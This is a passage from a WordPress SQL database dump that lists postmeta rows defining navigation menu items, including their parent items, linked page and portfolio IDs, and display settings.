'_menu_item_icon','null'),(49325,4040,'_menu_item_type','post_type'),(49326,4040,'_menu_item_menu_item_parent','4012'),(49327,4040,'_menu_item_object_id','3035'),(49328,4040,'_menu_item_object','page'),(49329,4040,'_menu_item_target',''),(49330,4040,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49331,4040,'_menu_item_xfn',''),(49332,4040,'_menu_item_url',''),(49333,4040,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49334,4040,'_menu_item_icon','null'),(49335,4041,'_menu_item_type','post_type'),(49336,4041,'_menu_item_menu_item_parent','4012'),(49337,4041,'_menu_item_object_id','3037'),(49338,4041,'_menu_item_object','page'),(49339,4041,'_menu_item_target',''),(49340,4041,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49341,4041,'_menu_item_xfn',''),(49342,4041,'_menu_item_url',''),(49343,4041,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49344,4041,'_menu_item_icon','null'),(49345,4042,'_menu_item_type','post_type'),(49346,4042,'_menu_item_menu_item_parent','4012'),(49347,4042,'_menu_item_object_id','3036'),(49348,4042,'_menu_item_object','page'),(49349,4042,'_menu_item_target',''),(49350,4042,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49351,4042,'_menu_item_xfn',''),(49352,4042,'_menu_item_url',''),(49353,4042,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49354,4042,'_menu_item_icon','null'),(49355,4043,'_menu_item_type','post_type'),(49356,4043,'_menu_item_menu_item_parent','4021'),(49357,4043,'_menu_item_object_id','3038'),(49358,4043,'_menu_item_object','page'),(49359,4043,'_menu_item_target',''),(49360,4043,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49361,4043,'_menu_item_xfn',''),(49362,4043,'_menu_item_url',''),(49363,4043,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49364,4043,'_menu_item_icon','null'),(49365,4044,'_menu_item_type','post_type'),(49366,4044,'_menu_item_menu_item_parent','4025'),(49367,4044,'_menu_item_object_id','3038'),(49368,4044,'_menu_item_object','page'),(49369,4044,'_menu_item_target',''),(49370,4044,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49371,4044,'_menu_item_xfn',''),(49372,4044,'_menu_item_url',''),(49373,4044,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49374,4044,'_menu_item_icon','null'),(49375,4045,'_menu_item_type','post_type'),(49376,4045,'_menu_item_menu_item_parent','3998'),(49377,4045,'_menu_item_object_id','3034'),(49378,4045,'_menu_item_object','page'),(49379,4045,'_menu_item_target',''),(49380,4045,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49381,4045,'_menu_item_xfn',''),(49382,4045,'_menu_item_url',''),(49383,4045,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49384,4045,'_menu_item_icon','null'),(49385,4046,'_menu_item_type','post_type'),(49386,4046,'_menu_item_menu_item_parent','4015'),(49387,4046,'_menu_item_object_id','3037'),(49388,4046,'_menu_item_object','page'),(49389,4046,'_menu_item_target',''),(49390,4046,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49391,4046,'_menu_item_xfn',''),(49392,4046,'_menu_item_url',''),(49393,4046,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49394,4046,'_menu_item_icon','null'),(49395,4047,'_menu_item_type','post_type'),(49396,4047,'_menu_item_menu_item_parent','4015'),(49397,4047,'_menu_item_object_id','3036'),(49398,4047,'_menu_item_object','page'),(49399,4047,'_menu_item_target',''),(49400,4047,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49401,4047,'_menu_item_xfn',''),(49402,4047,'_menu_item_url',''),(49403,4047,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49404,4047,'_menu_item_icon','null'),(49405,4048,'_menu_item_type','post_type'),(49406,4048,'_menu_item_menu_item_parent','4015'),(49407,4048,'_menu_item_object_id','3035'),(49408,4048,'_menu_item_object','page'),(49409,4048,'_menu_item_target',''),(49410,4048,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49411,4048,'_menu_item_xfn',''),(49412,4048,'_menu_item_url',''),(49413,4048,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49414,4048,'_menu_item_icon','null'),(49415,4049,'_menu_item_type','post_type'),(49416,4049,'_menu_item_menu_item_parent','4003'),(49417,4049,'_menu_item_object_id','3034'),(49418,4049,'_menu_item_object','page'),(49419,4049,'_menu_item_target',''),(49420,4049,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49421,4049,'_menu_item_xfn',''),(49422,4049,'_menu_item_url',''),(49423,4049,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49424,4050,'_menu_item_type','post_type'),(49425,4050,'_menu_item_menu_item_parent','4008'),(49426,4050,'_menu_item_object_id','3034'),(49427,4050,'_menu_item_object','page'),(49428,4050,'_menu_item_target',''),(49429,4050,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49430,4050,'_menu_item_xfn',''),(49431,4050,'_menu_item_url',''),(49432,4050,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49433,4051,'_menu_item_type','post_type'),(49434,4051,'_menu_item_menu_item_parent','3989'),(49435,4051,'_menu_item_object_id','3042'),(49436,4051,'_menu_item_object','page'),(49437,4051,'_menu_item_target',''),(49438,4051,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49439,4051,'_menu_item_xfn',''),(49440,4051,'_menu_item_url',''),(49441,4051,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49442,4051,'_menu_item_icon','null'),(49443,4052,'_menu_item_type','post_type'),(49444,4052,'_menu_item_menu_item_parent','3989'),(49445,4052,'_menu_item_object_id','3041'),(49446,4052,'_menu_item_object','page'),(49447,4052,'_menu_item_target',''),(49448,4052,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49449,4052,'_menu_item_xfn',''),(49450,4052,'_menu_item_url',''),(49451,4052,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49452,4052,'_menu_item_icon','null'),(49453,4053,'_menu_item_type','post_type'),(49454,4053,'_menu_item_menu_item_parent','3995'),(49455,4053,'_menu_item_object_id','3042'),(49456,4053,'_menu_item_object','page'),(49457,4053,'_menu_item_target',''),(49458,4053,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49459,4053,'_menu_item_xfn',''),(49460,4053,'_menu_item_url',''),(49461,4053,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49462,4053,'_menu_item_icon','null'),(49463,4054,'_menu_item_type','post_type'),(49464,4054,'_menu_item_menu_item_parent','3995'),(49465,4054,'_menu_item_object_id','3041'),(49466,4054,'_menu_item_object','page'),(49467,4054,'_menu_item_target',''),(49468,4054,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49469,4054,'_menu_item_xfn',''),(49470,4054,'_menu_item_url',''),(49471,4054,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49472,4054,'_menu_item_icon','null'),(49473,4055,'_menu_item_type','post_type'),(49474,4055,'_menu_item_menu_item_parent','4015'),(49475,4055,'_menu_item_object_id','3044'),(49476,4055,'_menu_item_object','page'),(49477,4055,'_menu_item_target',''),(49478,4055,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49479,4055,'_menu_item_xfn',''),(49480,4055,'_menu_item_url',''),(49481,4055,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49482,4055,'_menu_item_icon','null'),(49483,4056,'_menu_item_type','post_type'),(49484,4056,'_menu_item_menu_item_parent','4008'),(49485,4056,'_menu_item_object_id','3044'),(49486,4056,'_menu_item_object','page'),(49487,4056,'_menu_item_target',''),(49488,4056,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49489,4056,'_menu_item_xfn',''),(49490,4056,'_menu_item_url',''),(49491,4056,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49492,4057,'_menu_item_type','post_type'),(49493,4057,'_menu_item_menu_item_parent','4012'),(49494,4057,'_menu_item_object_id','3044'),(49495,4057,'_menu_item_object','page'),(49496,4057,'_menu_item_target',''),(49497,4057,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49498,4057,'_menu_item_xfn',''),(49499,4057,'_menu_item_url',''),(49500,4057,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49501,4057,'_menu_item_icon','null'),(49502,4058,'_menu_item_type','post_type'),(49503,4058,'_menu_item_menu_item_parent','3990'),(49504,4058,'_menu_item_object_id','3043'),(49505,4058,'_menu_item_object','page'),(49506,4058,'_menu_item_target',''),(49507,4058,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49508,4058,'_menu_item_xfn',''),(49509,4058,'_menu_item_url',''),(49510,4058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49511,4058,'_menu_item_icon','null'),(49512,4059,'_menu_item_type','post_type'),(49513,4059,'_menu_item_menu_item_parent','3996'),(49514,4059,'_menu_item_object_id','3043'),(49515,4059,'_menu_item_object','page'),(49516,4059,'_menu_item_target',''),(49517,4059,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49518,4059,'_menu_item_xfn',''),(49519,4059,'_menu_item_url',''),(49520,4059,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49521,4059,'_menu_item_icon','null'),(49522,4060,'_menu_item_type','post_type'),(49523,4060,'_menu_item_menu_item_parent','4014'),(49524,4060,'_menu_item_object_id','3047'),(49525,4060,'_menu_item_object','page'),(49526,4060,'_menu_item_target',''),(49527,4060,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49528,4060,'_menu_item_xfn',''),(49529,4060,'_menu_item_url',''),(49530,4060,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49531,4060,'_menu_item_icon','null'),(49532,4061,'_menu_item_type','post_type'),(49533,4061,'_menu_item_menu_item_parent','4014'),(49534,4061,'_menu_item_object_id','3046'),(49535,4061,'_menu_item_object','page'),(49536,4061,'_menu_item_target',''),(49537,4061,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49538,4061,'_menu_item_xfn',''),(49539,4061,'_menu_item_url',''),(49540,4061,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49541,4061,'_menu_item_icon','null'),(49542,4062,'_menu_item_type','post_type'),(49543,4062,'_menu_item_menu_item_parent','4014'),(49544,4062,'_menu_item_object_id','3045'),(49545,4062,'_menu_item_object','page'),(49546,4062,'_menu_item_target',''),(49547,4062,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49548,4062,'_menu_item_xfn',''),(49549,4062,'_menu_item_url',''),(49550,4062,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49551,4062,'_menu_item_icon','null'),(49552,4063,'_menu_item_type','post_type'),(49553,4063,'_menu_item_menu_item_parent','4008'),(49554,4063,'_menu_item_object_id','3045'),(49555,4063,'_menu_item_object','page'),(49556,4063,'_menu_item_target',''),(49557,4063,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49558,4063,'_menu_item_xfn',''),(49559,4063,'_menu_item_url',''),(49560,4063,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49561,4064,'_menu_item_type','post_type'),(49562,4064,'_menu_item_menu_item_parent','4011'),(49563,4064,'_menu_item_object_id','3047'),(49564,4064,'_menu_item_object','page'),(49565,4064,'_menu_item_target',''),(49566,4064,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49567,4064,'_menu_item_xfn',''),(49568,4064,'_menu_item_url',''),(49569,4064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49570,4064,'_menu_item_icon','null'),(49571,4065,'_menu_item_type','post_type'),(49572,4065,'_menu_item_menu_item_parent','4011'),(49573,4065,'_menu_item_object_id','3046'),(49574,4065,'_menu_item_object','page'),(49575,4065,'_menu_item_target',''),(49576,4065,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49577,4065,'_menu_item_xfn',''),(49578,4065,'_menu_item_url',''),(49579,4065,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49580,4065,'_menu_item_icon','null'),(49581,4066,'_menu_item_type','post_type'),(49582,4066,'_menu_item_menu_item_parent','4011'),(49583,4066,'_menu_item_object_id','3045'),(49584,4066,'_menu_item_object','page'),(49585,4066,'_menu_item_target',''),(49586,4066,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49587,4066,'_menu_item_xfn',''),(49588,4066,'_menu_item_url',''),(49589,4066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49590,4066,'_menu_item_icon','null'),(49591,4067,'_menu_item_type','post_type'),(49592,4067,'_menu_item_menu_item_parent','3996'),(49593,4067,'_menu_item_object_id','3048'),(49594,4067,'_menu_item_object','page'),(49595,4067,'_menu_item_target',''),(49596,4067,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49597,4067,'_menu_item_xfn',''),(49598,4067,'_menu_item_url',''),(49599,4067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49600,4067,'_menu_item_icon','null'),(49601,4068,'_menu_item_type','post_type'),(49602,4068,'_menu_item_menu_item_parent','3996'),(49603,4068,'_menu_item_object_id','3051'),(49604,4068,'_menu_item_object','page'),(49605,4068,'_menu_item_target',''),(49606,4068,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49607,4068,'_menu_item_xfn',''),(49608,4068,'_menu_item_url',''),(49609,4068,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49610,4068,'_menu_item_icon','null'),(49611,4069,'_menu_item_type','post_type'),(49612,4069,'_menu_item_menu_item_parent','3996'),(49613,4069,'_menu_item_object_id','3050'),(49614,4069,'_menu_item_object','page'),(49615,4069,'_menu_item_target',''),(49616,4069,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49617,4069,'_menu_item_xfn',''),(49618,4069,'_menu_item_url',''),(49619,4069,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49620,4069,'_menu_item_icon','null'),(49621,4070,'_menu_item_type','post_type'),(49622,4070,'_menu_item_menu_item_parent','3996'),(49623,4070,'_menu_item_object_id','3049'),(49624,4070,'_menu_item_object','page'),(49625,4070,'_menu_item_target',''),(49626,4070,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49627,4070,'_menu_item_xfn',''),(49628,4070,'_menu_item_url',''),(49629,4070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49630,4070,'_menu_item_icon','null'),(49631,4071,'_menu_item_type','post_type'),(49632,4071,'_menu_item_menu_item_parent','3995'),(49633,4071,'_menu_item_object_id','3040'),(49634,4071,'_menu_item_object','page'),(49635,4071,'_menu_item_target',''),(49636,4071,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49637,4071,'_menu_item_xfn',''),(49638,4071,'_menu_item_url',''),(49639,4071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49640,4071,'_menu_item_icon','null'),(49641,4072,'_menu_item_type','post_type'),(49642,4072,'_menu_item_menu_item_parent','4006'),(49643,4072,'_menu_item_object_id','3042'),(49644,4072,'_menu_item_object','page'),(49645,4072,'_menu_item_target',''),(49646,4072,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49647,4072,'_menu_item_xfn',''),(49648,4072,'_menu_item_url',''),(49649,4072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49650,4073,'_menu_item_type','post_type'),(49651,4073,'_menu_item_menu_item_parent','4006'),(49652,4073,'_menu_item_object_id','3040'),(49653,4073,'_menu_item_object','page'),(49654,4073,'_menu_item_target',''),(49655,4073,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49656,4073,'_menu_item_xfn',''),(49657,4073,'_menu_item_url',''),(49658,4073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49659,4074,'_menu_item_type','post_type'),(49660,4074,'_menu_item_menu_item_parent','4001'),(49661,4074,'_menu_item_object_id','3040'),(49662,4074,'_menu_item_object','page'),(49663,4074,'_menu_item_target',''),(49664,4074,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49665,4074,'_menu_item_xfn',''),(49666,4074,'_menu_item_url',''),(49667,4074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49668,4075,'_menu_item_type','post_type'),(49669,4075,'_menu_item_menu_item_parent','3996'),(49670,4075,'_menu_item_object_id','3052'),(49671,4075,'_menu_item_object','page'),(49672,4075,'_menu_item_target',''),(49673,4075,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49674,4075,'_menu_item_xfn',''),(49675,4075,'_menu_item_url',''),(49676,4075,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49677,4075,'_menu_item_icon','null'),(49678,4076,'_menu_item_type','post_type'),(49679,4076,'_menu_item_menu_item_parent','3989'),(49680,4076,'_menu_item_object_id','3053'),(49681,4076,'_menu_item_object','page'),(49682,4076,'_menu_item_target',''),(49683,4076,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49684,4076,'_menu_item_xfn',''),(49685,4076,'_menu_item_url',''),(49686,4076,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49687,4076,'_menu_item_icon','null'),(49688,4077,'_menu_item_type','post_type'),(49689,4077,'_menu_item_menu_item_parent','3995'),(49690,4077,'_menu_item_object_id','3053'),(49691,4077,'_menu_item_object','page'),(49692,4077,'_menu_item_target',''),(49693,4077,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49694,4077,'_menu_item_xfn',''),(49695,4077,'_menu_item_url',''),(49696,4077,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49697,4077,'_menu_item_icon','null'),(49698,4078,'_menu_item_type','post_type'),(49699,4078,'_menu_item_menu_item_parent','4006'),(49700,4078,'_menu_item_object_id','3053'),(49701,4078,'_menu_item_object','page'),(49702,4078,'_menu_item_target',''),(49703,4078,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49704,4078,'_menu_item_xfn',''),(49705,4078,'_menu_item_url',''),(49706,4078,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49707,4079,'_menu_item_type','post_type'),(49708,4079,'_menu_item_menu_item_parent','3989'),(49709,4079,'_menu_item_object_id','3055'),(49710,4079,'_menu_item_object','page'),(49711,4079,'_menu_item_target',''),(49712,4079,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49713,4079,'_menu_item_xfn',''),(49714,4079,'_menu_item_url',''),(49715,4079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49716,4079,'_menu_item_icon','null'),(49717,4080,'_menu_item_type','post_type'),(49718,4080,'_menu_item_menu_item_parent','3995'),(49719,4080,'_menu_item_object_id','3055'),(49720,4080,'_menu_item_object','page'),(49721,4080,'_menu_item_target',''),(49722,4080,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49723,4080,'_menu_item_xfn',''),(49724,4080,'_menu_item_url',''),(49725,4080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49726,4080,'_menu_item_icon','null'),(49727,4081,'_menu_item_type','post_type'),(49728,4081,'_menu_item_menu_item_parent','3995'),(49729,4081,'_menu_item_object_id','3441'),(49730,4081,'_menu_item_object','page'),(49731,4081,'_menu_item_target',''),(49732,4081,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49733,4081,'_menu_item_xfn',''),(49734,4081,'_menu_item_url',''),(49735,4081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49736,4081,'_menu_item_icon','null'),(49737,4082,'_menu_item_type','post_type'),(49738,4082,'_menu_item_menu_item_parent','3989'),(49739,4082,'_menu_item_object_id','3441'),(49740,4082,'_menu_item_object','page'),(49741,4082,'_menu_item_target',''),(49742,4082,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49743,4082,'_menu_item_xfn',''),(49744,4082,'_menu_item_url',''),(49745,4082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49746,4082,'_menu_item_icon','null'),(49747,4083,'_menu_item_type','post_type'),(49748,4083,'_menu_item_menu_item_parent','3996'),(49749,4083,'_menu_item_object_id','3054'),(49750,4083,'_menu_item_object','page'),(49751,4083,'_menu_item_target',''),(49752,4083,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49753,4083,'_menu_item_xfn',''),(49754,4083,'_menu_item_url',''),(49755,4083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49756,4083,'_menu_item_icon','null'),(49757,4084,'_menu_item_type','post_type'),(49758,4084,'_menu_item_menu_item_parent','3996'),(49759,4084,'_menu_item_object_id','3057'),(49760,4084,'_menu_item_object','page'),(49761,4084,'_menu_item_target',''),(49762,4084,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49763,4084,'_menu_item_xfn',''),(49764,4084,'_menu_item_url',''),(49765,4084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49766,4084,'_menu_item_icon','null'),(49767,4085,'_menu_item_type','post_type'),(49768,4085,'_menu_item_menu_item_parent','3996'),(49769,4085,'_menu_item_object_id','3058'),(49770,4085,'_menu_item_object','page'),(49771,4085,'_menu_item_target',''),(49772,4085,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49773,4085,'_menu_item_xfn',''),(49774,4085,'_menu_item_url',''),(49775,4085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49776,4085,'_menu_item_icon','null'),(49777,4086,'_menu_item_type','post_type'),(49778,4086,'_menu_item_menu_item_parent','3996'),(49779,4086,'_menu_item_object_id','4035'),(49780,4086,'_menu_item_object','page'),(49781,4086,'_menu_item_target',''),(49782,4086,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49783,4086,'_menu_item_xfn',''),(49784,4086,'_menu_item_url',''),(49785,4086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49786,4086,'_menu_item_icon','null'),(49787,4087,'_menu_item_type','post_type'),(49788,4087,'_menu_item_menu_item_parent','3995'),(49789,4087,'_menu_item_object_id','3060'),(49790,4087,'_menu_item_object','page'),(49791,4087,'_menu_item_target',''),(49792,4087,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49793,4087,'_menu_item_xfn',''),(49794,4087,'_menu_item_url',''),(49795,4087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49796,4087,'_menu_item_icon','null'),(49797,4088,'_menu_item_type','post_type'),(49798,4088,'_menu_item_menu_item_parent','3989'),(49799,4088,'_menu_item_object_id','3060'),(49800,4088,'_menu_item_object','page'),(49801,4088,'_menu_item_target',''),(49802,4088,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49803,4088,'_menu_item_xfn',''),(49804,4088,'_menu_item_url',''),(49805,4088,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49806,4088,'_menu_item_icon','null'),(49807,4089,'_menu_item_type','post_type'),(49808,4089,'_menu_item_menu_item_parent','4001'),(49809,4089,'_menu_item_object_id','3060'),(49810,4089,'_menu_item_object','page'),(49811,4089,'_menu_item_target',''),(49812,4089,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49813,4089,'_menu_item_xfn',''),(49814,4089,'_menu_item_url',''),(49815,4089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49816,4090,'_menu_item_type','post_type'),(49817,4090,'_menu_item_menu_item_parent','4030'),(49818,4090,'_menu_item_object_id','3067'),(49819,4090,'_menu_item_object','page'),(49820,4090,'_menu_item_target',''),(49821,4090,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49822,4090,'_menu_item_xfn',''),(49823,4090,'_menu_item_url',''),(49824,4090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49825,4090,'_menu_item_icon','null'),(49826,4091,'_menu_item_type','post_type'),(49827,4091,'_menu_item_menu_item_parent','4030'),(49828,4091,'_menu_item_object_id','3066'),(49829,4091,'_menu_item_object','page'),(49830,4091,'_menu_item_target',''),(49831,4091,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49832,4091,'_menu_item_xfn',''),(49833,4091,'_menu_item_url',''),(49834,4091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49835,4091,'_menu_item_icon','null'),(49836,4092,'_menu_item_type','post_type'),(49837,4092,'_menu_item_menu_item_parent','4030'),(49838,4092,'_menu_item_object_id','3065'),(49839,4092,'_menu_item_object','page'),(49840,4092,'_menu_item_target',''),(49841,4092,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49842,4092,'_menu_item_xfn',''),(49843,4092,'_menu_item_url',''),(49844,4092,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49845,4092,'_menu_item_icon','null'),(49846,4093,'_menu_item_type','post_type'),(49847,4093,'_menu_item_menu_item_parent','4026'),(49848,4093,'_menu_item_object_id','3077'),(49849,4093,'_menu_item_object','portfolio-item'),(49850,4093,'_menu_item_target',''),(49851,4093,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49852,4093,'_menu_item_xfn',''),(49853,4093,'_menu_item_url',''),(49854,4093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49855,4093,'_menu_item_icon','null'),(49856,4094,'_menu_item_type','post_type'),(49857,4094,'_menu_item_menu_item_parent','4026'),(49858,4094,'_menu_item_object_id','3076'),(49859,4094,'_menu_item_object','portfolio-item'),(49860,4094,'_menu_item_target',''),(49861,4094,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49862,4094,'_menu_item_xfn',''),(49863,4094,'_menu_item_url',''),(49864,4094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49865,4094,'_menu_item_icon','null'),(49866,4095,'_menu_item_type','post_type'),(49867,4095,'_menu_item_menu_item_parent','4026'),(49868,4095,'_menu_item_object_id','3075'),(49869,4095,'_menu_item_object','portfolio-item'),(49870,4095,'_menu_item_target',''),(49871,4095,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49872,4095,'_menu_item_xfn',''),(49873,4095,'_menu_item_url',''),(49874,4095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49875,4095,'_menu_item_icon','null'),(49876,4096,'_menu_item_type','post_type'),(49877,4096,'_menu_item_menu_item_parent','4026'),(49878,4096,'_menu_item_object_id','3098'),(49879,4096,'_menu_item_object','portfolio-item'),(49880,4096,'_menu_item_target',''),(49881,4096,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49882,4096,'_menu_item_xfn',''),(49883,4096,'_menu_item_url',''),(49884,4096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49885,4096,'_menu_item_icon','null'),(49886,4097,'_menu_item_type','post_type'),(49887,4097,'_menu_item_menu_item_parent','3995'),(49888,4097,'_menu_item_object_id','3068'),(49889,4097,'_menu_item_object','page'),(49890,4097,'_menu_item_target',''),(49891,4097,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49892,4097,'_menu_item_xfn',''),(49893,4097,'_menu_item_url',''),(49894,4097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49895,4097,'_menu_item_icon','null'),(49896,4098,'_menu_item_type','post_type'),(49897,4098,'_menu_item_menu_item_parent','3989'),(49898,4098,'_menu_item_object_id','3068'),(49899,4098,'_menu_item_object','page'),(49900,4098,'_menu_item_target',''),(49901,4098,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49902,4098,'_menu_item_xfn',''),(49903,4098,'_menu_item_url',''),(49904,4098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49905,4098,'_menu_item_icon','null'),(49906,4099,'_menu_item_type','post_type'),(49907,4099,'_menu_item_menu_item_parent','4018'),(49908,4099,'_menu_item_object_id','3071'),(49909,4099,'_menu_item_object','page'),(49910,4099,'_menu_item_target',''),(49911,4099,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49912,4099,'_menu_item_xfn',''),(49913,4099,'_menu_item_url',''),(49914,4099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49915,4099,'_menu_item_icon','null'),(49916,4100,'_menu_item_type','post_type'),(49917,4100,'_menu_item_menu_item_parent','4021'),(49918,4100,'_menu_item_object_id','3070'),(49919,4100,'_menu_item_object','page'),(49920,4100,'_menu_item_target',''),(49921,4100,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49922,4100,'_menu_item_xfn',''),(49923,4100,'_menu_item_url',''),(49924,4100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49925,4100,'_menu_item_icon','null'),(49926,4101,'_menu_item_type','post_type'),(49927,4101,'_menu_item_menu_item_parent','4021'),(49928,4101,'_menu_item_object_id','3069'),(49929,4101,'_menu